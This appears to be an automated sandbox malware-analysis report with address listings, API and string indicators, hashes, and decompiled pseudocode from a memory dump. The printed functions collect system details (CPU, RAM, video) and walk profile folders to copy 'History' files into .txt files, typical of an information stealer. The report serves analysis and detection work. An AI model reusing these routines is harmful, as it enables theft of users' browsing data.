                                                                                                                                                                                              0x0041493d
                                                                                                                                                                                              0x00414942
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00414959
                                                                                                                                                                                              0x00414969
                                                                                                                                                                                              0x0041496e
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00414974
                                                                                                                                                                                              0x0041497f
                                                                                                                                                                                              0x00414982
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x0041498d
                                                                                                                                                                                              0x00414992
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x004149a1
                                                                                                                                                                                              0x004149b2
                                                                                                                                                                                              0x004149b7
                                                                                                                                                                                              0x004149ba
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x004149c0
                                                                                                                                                                                              0x004149ce
                                                                                                                                                                                              0x004149cf
                                                                                                                                                                                              0x004149d1
                                                                                                                                                                                              0x00414a71
                                                                                                                                                                                              0x00414a71
                                                                                                                                                                                              0x00414a75
                                                                                                                                                                                              0x00414a7f
                                                                                                                                                                                              0x00414a7f
                                                                                                                                                                                              0x00414a80
                                                                                                                                                                                              0x00414a8f
                                                                                                                                                                                              0x00414a94
                                                                                                                                                                                              0x00414aa9
                                                                                                                                                                                              0x00414aa9
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00414a75
                                                                                                                                                                                              0x004149d7
                                                                                                                                                                                              0x004149d8
                                                                                                                                                                                              0x004149d8
                                                                                                                                                                                              0x004149da
                                                                                                                                                                                              0x004149e3
                                                                                                                                                                                              0x004149f4
                                                                                                                                                                                              0x00414a05
                                                                                                                                                                                              0x00414a10
                                                                                                                                                                                              0x00414a1d
                                                                                                                                                                                              0x00414a2e
                                                                                                                                                                                              0x00414a3f
                                                                                                                                                                                              0x00414a50
                                                                                                                                                                                              0x00414a5b
                                                                                                                                                                                              0x00414a5c
                                                                                                                                                                                              0x00414a61
                                                                                                                                                                                              0x00414a63
                                                                                                                                                                                              0x00414a65
                                                                                                                                                                                              0x00414a65
                                                                                                                                                                                              0x00414a69
                                                                                                                                                                                              0x00414a6a
                                                                                                                                                                                              0x00414a6a
                                                                                                                                                                                              0x00414a6a
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x004149da
                                                                                                                                                                                              0x0041476c
                                                                                                                                                                                              0x0041477d
                                                                                                                                                                                              0x0041478d
                                                                                                                                                                                              0x00414792
                                                                                                                                                                                              0x00414794
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x004147a0
                                                                                                                                                                                              0x004147a8
                                                                                                                                                                                              0x004147ad
                                                                                                                                                                                              0x004147b0
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x004147c0
                                                                                                                                                                                              0x004147c1
                                                                                                                                                                                              0x004147c3
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x004147c9
                                                                                                                                                                                              0x004147ca
                                                                                                                                                                                              0x004147ca
                                                                                                                                                                                              0x004147cc
                                                                                                                                                                                              0x004147d5
                                                                                                                                                                                              0x004147e6
                                                                                                                                                                                              0x004147f7
                                                                                                                                                                                              0x004147fe
                                                                                                                                                                                              0x00414800
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x0041490a
                                                                                                                                                                                              0x0041490b
                                                                                                                                                                                              0x0041490b
                                                                                                                                                                                              0x0041490c
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x0041490c
                                                                                                                                                                                              0x0041480f
                                                                                                                                                                                              0x0041481d
                                                                                                                                                                                              0x0041482b
                                                                                                                                                                                              0x00414839
                                                                                                                                                                                              0x00414847
                                                                                                                                                                                              0x00414855
                                                                                                                                                                                              0x0041485a
                                                                                                                                                                                              0x0041485d
                                                                                                                                                                                              0x0041486b
                                                                                                                                                                                              0x00414870
                                                                                                                                                                                              0x0041487e
                                                                                                                                                                                              0x00414895
                                                                                                                                                                                              0x0041489a
                                                                                                                                                                                              0x0041489d
                                                                                                                                                                                              0x004148a2
                                                                                                                                                                                              0x004148b0
                                                                                                                                                                                              0x004148c1
                                                                                                                                                                                              0x004148d2
                                                                                                                                                                                              0x004148dd
                                                                                                                                                                                              0x004148e7
                                                                                                                                                                                              0x004148f2
                                                                                                                                                                                              0x004148f3
                                                                                                                                                                                              0x004148f8
                                                                                                                                                                                              0x004148fb
                                                                                                                                                                                              0x004148ff
                                                                                                                                                                                              0x00414901
                                                                                                                                                                                              0x00414906
                                                                                                                                                                                              0x00414906
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x004148ff
                                                                                                                                                                                              0x0041462b
                                                                                                                                                                                              0x00414632
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00414643
                                                                                                                                                                                              0x00414644
                                                                                                                                                                                              0x00414645
                                                                                                                                                                                              0x00414648
                                                                                                                                                                                              0x00414649
                                                                                                                                                                                              0x0041464d
                                                                                                                                                                                              0x0041465e
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00414664
                                                                                                                                                                                              0x0041466e
                                                                                                                                                                                              0x0041466f
                                                                                                                                                                                              0x00414671
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00414677
                                                                                                                                                                                              0x00414678
                                                                                                                                                                                              0x00414678
                                                                                                                                                                                              0x0041467a
                                                                                                                                                                                              0x00414683
                                                                                                                                                                                              0x00414694
                                                                                                                                                                                              0x0041469b
                                                                                                                                                                                              0x0041469d
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00414751
                                                                                                                                                                                              0x00414752
                                                                                                                                                                                              0x00414752
                                                                                                                                                                                              0x00414753
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00414753
                                                                                                                                                                                              0x004146ac
                                                                                                                                                                                              0x004146ba
                                                                                                                                                                                              0x004146c5
                                                                                                                                                                                              0x004146d2
                                                                                                                                                                                              0x004146dc
                                                                                                                                                                                              0x004146e1
                                                                                                                                                                                              0x004146e4
                                                                                                                                                                                              0x004146e9
                                                                                                                                                                                              0x004146f7
                                                                                                                                                                                              0x00414708
                                                                                                                                                                                              0x00414719
                                                                                                                                                                                              0x00414724
                                                                                                                                                                                              0x0041472e
                                                                                                                                                                                              0x00414739
                                                                                                                                                                                              0x0041473a
                                                                                                                                                                                              0x0041473f
                                                                                                                                                                                              0x00414742
                                                                                                                                                                                              0x00414746
                                                                                                                                                                                              0x00414748
                                                                                                                                                                                              0x0041474d
                                                                                                                                                                                              0x0041474d
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00414746
                                                                                                                                                                                              0x0041464f
                                                                                                                                                                                              0x00414654
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00414aae
                                                                                                                                                                                              0x00414ab6
                                                                                                                                                                                              0x00414abb
                                                                                                                                                                                              0x00414abb
                                                                                                                                                                                              0x00414ac4
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00414ac4
                                                                                                                                                                                              0x00414534
                                                                                                                                                                                              0x00414536
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00414538
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00414538
                                                                                                                                                                                              0x00414536
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00414ac9

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • FindFirstFileW.KERNEL32(00000000,?,?,0041A69E), ref: 004145C5
                                                                                                                                                                                                • Part of subcall function 00403B98: SysFreeString.OLEAUT32(?), ref: 00403BAB
                                                                                                                                                                                                • Part of subcall function 00403B80: SysFreeString.OLEAUT32(00000000), ref: 00403B8E
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000006.00000002.272222286.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: FreeString$FileFindFirst
                                                                                                                                                                                              • String ID: .LNK$._.$0_@$LLA$CA
                                                                                                                                                                                              • API String ID: 1653790112-882170572
                                                                                                                                                                                              • Opcode ID: eabfcec7a1b34a96f3a487c33c476ef2dae85da7546450ac9a0750b76edb40a6
                                                                                                                                                                                              • Instruction ID: 9c4ae2fa8e47753b2fad7318643bbdaa039e98a1c6b9804601cb0bccf78cece1
                                                                                                                                                                                              • Opcode Fuzzy Hash: eabfcec7a1b34a96f3a487c33c476ef2dae85da7546450ac9a0750b76edb40a6
                                                                                                                                                                                              • Instruction Fuzzy Hash: 6A224374A0011E9BCB10EF55C985ADEB7B9EF84308F1081B7E504B7296DB38AF858F59
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 00416740, Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 116COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              C-Code - Quality: 47%
                                                                                                                                                                                              			E00416740(intOrPtr* __eax, void* __ebx, void* __esi) {
				struct _SYSTEM_INFO _v40;
				intOrPtr _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				char _v64;
				char _v68;
				intOrPtr _v72;
				char _v76;
				char _v80;
				char _v84;
				char _v88;
				char _v92;
				signed int _t38;
				signed int _t39;
				signed int _t92;
				void* _t93;
				void* _t94;
				intOrPtr _t113;
				void* _t117;
				intOrPtr _t120;
				intOrPtr _t121;

				_t118 = __esi;
				_t38 = __eax +  *__eax;
				 *_t38 =  *_t38 + _t38;
				_t39 = _t38 | 0x5500000a;
				_t120 = _t121;
				_t93 = 0xb;
				do {
					_push(0);
					_push(0);
					_t93 = _t93 - 1;
					_t124 = _t93;
				} while (_t93 != 0);
				_t92 = _t39;
				_push(_t120);
				_push(0x4168d4);
				_push( *[fs:eax]);
				 *[fs:eax] = _t121;
				GetSystemInfo( &_v40);
				E00403D2C( &_v48,  *_t92);
				_push(_v48);
				_push(L"CPU Model: ");
				_push(0);
				_push( &_v52);
				E00406984("UHJvY2Vzc29yTmFtZVN0cmluZw==", _t92,  &_v60, _t117, __esi);
				E00403D2C( &_v56, _v60);
				_push(_v56);
				E00406984("SEFSRFdBUkVcREVTQ1JJUFRJT05cU3lzdGVtXENlbnRyYWxQcm9jZXNzb3JcMA==", _t92,  &_v68, _t117, __esi);
				E00403D2C( &_v64, _v68);
				_pop(_t94);
				E00407500(0x80000002, _t92, _t94, _v64);
				_push(_v52);
				_push(0x416974);
				E00403E1C();
				E0040377C(_t92, _v44);
				E004037DC( &_v80, "CPU Count: ",  *_t92);
				E00403D2C( &_v76, _v80);
				_push(_v76);
				E00406FDC(_v40.dwNumberOfProcessors, _t92,  &_v84, __esi, _t124);
				_push(_v84);
				_push(0x416974);
				E00403E1C();
				E0040377C(_t92, _v72);
				_push( *_t92);
				_push("GetRAM: ");
				E00416584( &_v88, _t92, _t118, _t124);
				_push(_v88);
				_push(0x4169ac);
				E00403850();
				_push( *_t92);
				_push("Video Info\r\n");
				E00416644( &_v92, _t92, _t117, _t118);
				_push(_v92);
				E00403850();
				_t113 = 0x4169ac;
				 *[fs:eax] = _t113;
				_push(E004168DB);
				E00403508( &_v92, 2);
				E00403B80( &_v84);
				E004034E4( &_v80);
				E00403B98( &_v76, 2);
				E004034E4( &_v68);
				E00403B80( &_v64);
				E004034E4( &_v60);
				return E00403B98( &_v56, 4);
			}


























                                                                                                                                                                                              0x00416740
                                                                                                                                                                                              0x00416740
                                                                                                                                                                                              0x00416742
                                                                                                                                                                                              0x00416744
                                                                                                                                                                                              0x00416749
                                                                                                                                                                                              0x0041674b
                                                                                                                                                                                              0x00416750
                                                                                                                                                                                              0x00416750
                                                                                                                                                                                              0x00416752
                                                                                                                                                                                              0x00416754
                                                                                                                                                                                              0x00416754
                                                                                                                                                                                              0x00416754
                                                                                                                                                                                              0x00416758
                                                                                                                                                                                              0x0041675c
                                                                                                                                                                                              0x0041675d
                                                                                                                                                                                              0x00416762
                                                                                                                                                                                              0x00416765
                                                                                                                                                                                              0x0041676c
                                                                                                                                                                                              0x00416776
                                                                                                                                                                                              0x0041677b
                                                                                                                                                                                              0x0041677e
                                                                                                                                                                                              0x00416783
                                                                                                                                                                                              0x00416788
                                                                                                                                                                                              0x00416791
                                                                                                                                                                                              0x0041679c
                                                                                                                                                                                              0x004167a4
                                                                                                                                                                                              0x004167ad
                                                                                                                                                                                              0x004167b8
                                                                                                                                                                                              0x004167c5
                                                                                                                                                                                              0x004167c6
                                                                                                                                                                                              0x004167cb
                                                                                                                                                                                              0x004167ce
                                                                                                                                                                                              0x004167db
                                                                                                                                                                                              0x004167e5
                                                                                                                                                                                              0x004167f4
                                                                                                                                                                                              0x004167ff
                                                                                                                                                                                              0x00416804
                                                                                                                                                                                              0x0041680d
                                                                                                                                                                                              0x00416812
                                                                                                                                                                                              0x00416815
                                                                                                                                                                                              0x00416822
                                                                                                                                                                                              0x0041682c
                                                                                                                                                                                              0x00416831
                                                                                                                                                                                              0x00416833
                                                                                                                                                                                              0x0041683b
                                                                                                                                                                                              0x00416840
                                                                                                                                                                                              0x00416843
                                                                                                                                                                                              0x0041684f
                                                                                                                                                                                              0x00416854
                                                                                                                                                                                              0x00416856
                                                                                                                                                                                              0x0041685e
                                                                                                                                                                                              0x00416863
                                                                                                                                                                                              0x00416872
                                                                                                                                                                                              0x00416879
                                                                                                                                                                                              0x0041687c
                                                                                                                                                                                              0x0041687f
                                                                                                                                                                                              0x0041688c
                                                                                                                                                                                              0x00416894
                                                                                                                                                                                              0x0041689c
                                                                                                                                                                                              0x004168a9
                                                                                                                                                                                              0x004168b1
                                                                                                                                                                                              0x004168b9
                                                                                                                                                                                              0x004168c1
                                                                                                                                                                                              0x004168d3

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetSystemInfo.KERNEL32(0041A13A,00000000,004168D4,?,?,00000000,00000000,?,0041748D,?,,?,Zone: ,?,004175A8,?), ref: 0041676C
                                                                                                                                                                                                • Part of subcall function 00403B80: SysFreeString.OLEAUT32(00000000), ref: 00403B8E
                                                                                                                                                                                                • Part of subcall function 00403B98: SysFreeString.OLEAUT32(?), ref: 00403BAB
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000006.00000002.272222286.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: FreeString$InfoSystem
                                                                                                                                                                                              • String ID: CPU Count: $CPU Model: $GetRAM: $SEFSRFdBUkVcREVTQ1JJUFRJT05cU3lzdGVtXENlbnRyYWxQcm9jZXNzb3JcMA==$UHJvY2Vzc29yTmFtZVN0cmluZw==$Video Info
                                                                                                                                                                                              • API String ID: 4070941872-1038824218
                                                                                                                                                                                              • Opcode ID: 994227d9c169a1dbbd8c134888da1df913b25c71fc93550dee7adeb46b23c78b
                                                                                                                                                                                              • Instruction ID: ec5783c0b7ca42e81122729fbed3a1ddf4b85dfc6774dd9c704540b43fb157b1
                                                                                                                                                                                              • Opcode Fuzzy Hash: 994227d9c169a1dbbd8c134888da1df913b25c71fc93550dee7adeb46b23c78b
                                                                                                                                                                                              • Instruction Fuzzy Hash: 64411270A1010D9BDB01FFD1D882ADDBBB9EF48309F51403BF504B7296D639EA458B59
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 00412D70, Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 159fileCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              C-Code - Quality: 52%
                                                                                                                                                                                              			E00412D70(signed int __eax, void* __ecx, char __edx, void* __edi, void* __esi, intOrPtr _a4) {
				signed int _v8;
				char _v12;
				char _v16;
				void* _v24;
				intOrPtr _v117;
				struct _WIN32_FIND_DATAW _v616;
				char _v620;
				intOrPtr _v624;
				char _v628;
				char _v632;
				char _v636;
				char _v640;
				char _v644;
				char _v648;
				char _v652;
				intOrPtr _v656;
				char _v660;
				signed int _t58;
				void* _t112;
				void* _t114;
				intOrPtr _t116;
				intOrPtr _t131;
				intOrPtr _t136;
				intOrPtr _t148;
				intOrPtr _t149;

				_t146 = __esi;
				_t145 = __edi;
				_pop(_t114);
				 *__eax =  *__eax + __eax;
				 *((intOrPtr*)(__eax + __eax)) =  *((intOrPtr*)(__eax + __eax)) + __eax;
				 *__eax =  *__eax + __eax;
				_pop(_t147);
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *((intOrPtr*)(__eax + __eax)) =  *((intOrPtr*)(__eax + __eax)) + __eax;
				 *__eax =  *__eax + __eax;
				_t58 = __eax | 0x00000a00;
				 *_t58 =  *_t58 + _t58;
				 *_t58 =  *_t58 + __ecx;
				 *_t58 =  *_t58 + _t58;
				 *0xd000a00 =  *0xd000a00 + __ecx;
				 *((intOrPtr*)(__edx)) =  *((intOrPtr*)(__edx)) + __ecx;
				 *_t58 =  *_t58 + _t58;
				 *_t58 =  *_t58 + _t58;
				_v117 = _v117 + __edx;
				_t148 = _t149;
				_push(__ecx);
				_t116 = 0x51;
				do {
					_push(0);
					_push(0);
					_t116 = _t116 - 1;
				} while (_t116 != 0);
				_push(_t116);
				_t7 =  &_v8;
				 *_t7 = _t116;
				_push(_t114);
				_push(__esi);
				_push(__edi);
				_v16 =  *_t7;
				_v12 = __edx;
				_v8 = _t58;
				E004040F4( &_v8);
				E004040F4( &_v12);
				E004040F4( &_v16);
				_push(_t148);
				_push(0x412fe0);
				_push( *[fs:eax]);
				 *[fs:eax] = _t149;
				E00403DB8( &_v620, L"\\*.*", _v8, 0);
				_v24 = FindFirstFileW(E00403D3C(_v620),  &_v616);
				do {
					_push(_v8);
					_push(0x413008);
					E00403D10( &_v628, 0x104,  &(_v616.cFileName));
					_push(_v628);
					_push(0x413008);
					E0040813C(0x61,  &_v632);
					_push(_v632);
					E00403E1C();
					if(E004076B0(_v624, _t114, 0x104) != 0) {
						_push(_t148);
						_push(0x412f54);
						_push( *[fs:eax]);
						 *[fs:eax] = _t149;
						if(_a4 == 0) {
							_push(_v8);
							_push(0x413008);
							E00403D10( &_v648, 0x104,  &(_v616.cFileName));
							_push(_v648);
							_push(L"\\History");
							E00403E1C();
							E004129A4(_v644, _t114,  &_v640, _t145, _t146);
							E0040377C( &_v636, _v640);
							_push(_v636);
							_push(_v16);
							_push(0x413008);
							_push(_v12);
							_push(0x413028);
							E00403D10( &_v660, 0x104,  &(_v616.cFileName));
							_push(_v660);
							_push(L".txt");
							E00403E1C();
							E0040377C( &_v652, _v656);
							_pop(_t112);
							E0040DCE8(_t112, _t114, _v652, _t145, _t146);
						}
						_pop(_t136);
						 *[fs:eax] = _t136;
					}
				} while (FindNextFileW(_v24,  &_v616) != 0);
				FindClose(_v24);
				_pop(_t131);
				 *[fs:eax] = _t131;
				_push(E00412FE7);
				E00403B98( &_v660, 2);
				E004034E4( &_v652);
				E00403B98( &_v648, 3);
				E004034E4( &_v636);
				E00403B98( &_v632, 4);
				return E00403B98( &_v16, 3);
			}




























                                                                                                                                                                                              0x00412d70
                                                                                                                                                                                              0x00412d70
                                                                                                                                                                                              0x00412d70
                                                                                                                                                                                              0x00412d71
                                                                                                                                                                                              0x00412d73
                                                                                                                                                                                              0x00412d76
                                                                                                                                                                                              0x00412d78
                                                                                                                                                                                              0x00412d79
                                                                                                                                                                                              0x00412d7b
                                                                                                                                                                                              0x00412d7d
                                                                                                                                                                                              0x00412d7f
                                                                                                                                                                                              0x00412d82
                                                                                                                                                                                              0x00412d84
                                                                                                                                                                                              0x00412d89
                                                                                                                                                                                              0x00412d8b
                                                                                                                                                                                              0x00412d8d
                                                                                                                                                                                              0x00412d8f
                                                                                                                                                                                              0x00412d95
                                                                                                                                                                                              0x00412d97
                                                                                                                                                                                              0x00412d99
                                                                                                                                                                                              0x00412d9b
                                                                                                                                                                                              0x00412d9d
                                                                                                                                                                                              0x00412d9f
                                                                                                                                                                                              0x00412da0
                                                                                                                                                                                              0x00412da5
                                                                                                                                                                                              0x00412da5
                                                                                                                                                                                              0x00412da7
                                                                                                                                                                                              0x00412da9
                                                                                                                                                                                              0x00412da9
                                                                                                                                                                                              0x00412dac
                                                                                                                                                                                              0x00412dad
                                                                                                                                                                                              0x00412dad
                                                                                                                                                                                              0x00412db0
                                                                                                                                                                                              0x00412db1
                                                                                                                                                                                              0x00412db2
                                                                                                                                                                                              0x00412db3
                                                                                                                                                                                              0x00412db6
                                                                                                                                                                                              0x00412db9
                                                                                                                                                                                              0x00412dbf
                                                                                                                                                                                              0x00412dc7
                                                                                                                                                                                              0x00412dcf
                                                                                                                                                                                              0x00412dd6
                                                                                                                                                                                              0x00412dd7
                                                                                                                                                                                              0x00412ddc
                                                                                                                                                                                              0x00412ddf
                                                                                                                                                                                              0x00412df7
                                                                                                                                                                                              0x00412e0d
                                                                                                                                                                                              0x00412e10
                                                                                                                                                                                              0x00412e10
                                                                                                                                                                                              0x00412e13
                                                                                                                                                                                              0x00412e29
                                                                                                                                                                                              0x00412e2e
                                                                                                                                                                                              0x00412e34
                                                                                                                                                                                              0x00412e44
                                                                                                                                                                                              0x00412e49
                                                                                                                                                                                              0x00412e5a
                                                                                                                                                                                              0x00412e6c
                                                                                                                                                                                              0x00412e74
                                                                                                                                                                                              0x00412e75
                                                                                                                                                                                              0x00412e7a
                                                                                                                                                                                              0x00412e7d
                                                                                                                                                                                              0x00412e84
                                                                                                                                                                                              0x00412e8a
                                                                                                                                                                                              0x00412e8d
                                                                                                                                                                                              0x00412ea3
                                                                                                                                                                                              0x00412ea8
                                                                                                                                                                                              0x00412eae
                                                                                                                                                                                              0x00412ebe
                                                                                                                                                                                              0x00412ecf
                                                                                                                                                                                              0x00412ee0
                                                                                                                                                                                              0x00412eeb
                                                                                                                                                                                              0x00412eec
                                                                                                                                                                                              0x00412eef
                                                                                                                                                                                              0x00412ef4
                                                                                                                                                                                              0x00412ef7
                                                                                                                                                                                              0x00412f0d
                                                                                                                                                                                              0x00412f12
                                                                                                                                                                                              0x00412f18
                                                                                                                                                                                              0x00412f28
                                                                                                                                                                                              0x00412f39
                                                                                                                                                                                              0x00412f44
                                                                                                                                                                                              0x00412f45
                                                                                                                                                                                              0x00412f45
                                                                                                                                                                                              0x00412f4c
                                                                                                                                                                                              0x00412f4f
                                                                                                                                                                                              0x00412f4f
                                                                                                                                                                                              0x00412f6e
                                                                                                                                                                                              0x00412f7a
                                                                                                                                                                                              0x00412f81
                                                                                                                                                                                              0x00412f84
                                                                                                                                                                                              0x00412f87
                                                                                                                                                                                              0x00412f97
                                                                                                                                                                                              0x00412fa2
                                                                                                                                                                                              0x00412fb2
                                                                                                                                                                                              0x00412fbd
                                                                                                                                                                                              0x00412fcd
                                                                                                                                                                                              0x00412fdf

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • FindFirstFileW.KERNEL32(00000000,?,00000000,00412FE0,?,00000000,0041B0FC,00000000,00000050,00000000,00000000,?,?,0041335C,00000000,00000000), ref: 00412E08
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000006.00000002.272222286.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: FileFindFirst
                                                                                                                                                                                              • String ID: .txt$\*.*$\History
                                                                                                                                                                                              • API String ID: 1974802433-2232271174
                                                                                                                                                                                              • Opcode ID: 60f1aed37e2e99f440532b90469936e73ba5a5dec6828e4ede608866b0779c33
                                                                                                                                                                                              • Instruction ID: 31102d54a49b3a600332046a535115537665bbef1f46384b784085fa532e6d73
                                                                                                                                                                                              • Opcode Fuzzy Hash: 60f1aed37e2e99f440532b90469936e73ba5a5dec6828e4ede608866b0779c33
                                                                                                                                                                                              • Instruction Fuzzy Hash: 61516C70909259AFCB12EB61CC45BDDBB78EF45304F2041EBA508F7192DA789F898B19
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 00412D9C, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 141fileCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              C-Code - Quality: 45%
                                                                                                                                                                                              			E00412D9C(char __eax, void* __ebx, void* __ecx, char __edx, void* __edi, void* __esi, intOrPtr _a4) {
				char _v8;
				char _v12;
				char _v16;
				void* _v24;
				struct _WIN32_FIND_DATAW _v616;
				char _v620;
				intOrPtr _v624;
				char _v628;
				char _v632;
				char _v636;
				char _v640;
				char _v644;
				char _v648;
				char _v652;
				intOrPtr _v656;
				char _v660;
				void* _t105;
				intOrPtr _t109;
				intOrPtr _t124;
				intOrPtr _t129;
				intOrPtr _t141;
				intOrPtr _t142;

				_t139 = __esi;
				_t138 = __edi;
				_t107 = __ebx;
				_t141 = _t142;
				_push(__ecx);
				_t109 = 0x51;
				do {
					_push(0);
					_push(0);
					_t109 = _t109 - 1;
				} while (_t109 != 0);
				_push(_t109);
				_t1 =  &_v8;
				 *_t1 = _t109;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v16 =  *_t1;
				_v12 = __edx;
				_v8 = __eax;
				E004040F4( &_v8);
				E004040F4( &_v12);
				E004040F4( &_v16);
				_push(_t141);
				_push(0x412fe0);
				_push( *[fs:eax]);
				 *[fs:eax] = _t142;
				E00403DB8( &_v620, L"\\*.*", _v8, 0);
				_v24 = FindFirstFileW(E00403D3C(_v620),  &_v616);
				do {
					_push(_v8);
					_push(0x413008);
					E00403D10( &_v628, 0x104,  &(_v616.cFileName));
					_push(_v628);
					_push(0x413008);
					E0040813C(0x61,  &_v632);
					_push(_v632);
					E00403E1C();
					if(E004076B0(_v624, _t107, 0x104) != 0) {
						_push(_t141);
						_push(0x412f54);
						_push( *[fs:eax]);
						 *[fs:eax] = _t142;
						if(_a4 == 0) {
							_push(_v8);
							_push(0x413008);
							E00403D10( &_v648, 0x104,  &(_v616.cFileName));
							_push(_v648);
							_push(L"\\History");
							E00403E1C();
							E004129A4(_v644, _t107,  &_v640, _t138, _t139);
							E0040377C( &_v636, _v640);
							_push(_v636);
							_push(_v16);
							_push(0x413008);
							_push(_v12);
							_push(0x413028);
							E00403D10( &_v660, 0x104,  &(_v616.cFileName));
							_push(_v660);
							_push(L".txt");
							E00403E1C();
							E0040377C( &_v652, _v656);
							_pop(_t105);
							E0040DCE8(_t105, _t107, _v652, _t138, _t139);
						}
						_pop(_t129);
						 *[fs:eax] = _t129;
					}
				} while (FindNextFileW(_v24,  &_v616) != 0);
				FindClose(_v24);
				_pop(_t124);
				 *[fs:eax] = _t124;
				_push(E00412FE7);
				E00403B98( &_v660, 2);
				E004034E4( &_v652);
				E00403B98( &_v648, 3);
				E004034E4( &_v636);
				E00403B98( &_v632, 4);
				return E00403B98( &_v16, 3);
			}

























                                                                                                                                                                                              0x00412d9c
                                                                                                                                                                                              0x00412d9c
                                                                                                                                                                                              0x00412d9c
                                                                                                                                                                                              0x00412d9d
                                                                                                                                                                                              0x00412d9f
                                                                                                                                                                                              0x00412da0
                                                                                                                                                                                              0x00412da5
                                                                                                                                                                                              0x00412da5
                                                                                                                                                                                              0x00412da7
                                                                                                                                                                                              0x00412da9
                                                                                                                                                                                              0x00412da9
                                                                                                                                                                                              0x00412dac
                                                                                                                                                                                              0x00412dad
                                                                                                                                                                                              0x00412dad
                                                                                                                                                                                              0x00412db0
                                                                                                                                                                                              0x00412db1
                                                                                                                                                                                              0x00412db2
                                                                                                                                                                                              0x00412db3
                                                                                                                                                                                              0x00412db6
                                                                                                                                                                                              0x00412db9
                                                                                                                                                                                              0x00412dbf
                                                                                                                                                                                              0x00412dc7
                                                                                                                                                                                              0x00412dcf
                                                                                                                                                                                              0x00412dd6
                                                                                                                                                                                              0x00412dd7
                                                                                                                                                                                              0x00412ddc
                                                                                                                                                                                              0x00412ddf
                                                                                                                                                                                              0x00412df7
                                                                                                                                                                                              0x00412e0d
                                                                                                                                                                                              0x00412e10
                                                                                                                                                                                              0x00412e10
                                                                                                                                                                                              0x00412e13
                                                                                                                                                                                              0x00412e29
                                                                                                                                                                                              0x00412e2e
                                                                                                                                                                                              0x00412e34
                                                                                                                                                                                              0x00412e44
                                                                                                                                                                                              0x00412e49
                                                                                                                                                                                              0x00412e5a
                                                                                                                                                                                              0x00412e6c
                                                                                                                                                                                              0x00412e74
                                                                                                                                                                                              0x00412e75
                                                                                                                                                                                              0x00412e7a
                                                                                                                                                                                              0x00412e7d
                                                                                                                                                                                              0x00412e84
                                                                                                                                                                                              0x00412e8a
                                                                                                                                                                                              0x00412e8d
                                                                                                                                                                                              0x00412ea3
                                                                                                                                                                                              0x00412ea8
                                                                                                                                                                                              0x00412eae
                                                                                                                                                                                              0x00412ebe
                                                                                                                                                                                              0x00412ecf
                                                                                                                                                                                              0x00412ee0
                                                                                                                                                                                              0x00412eeb
                                                                                                                                                                                              0x00412eec
                                                                                                                                                                                              0x00412eef
                                                                                                                                                                                              0x00412ef4
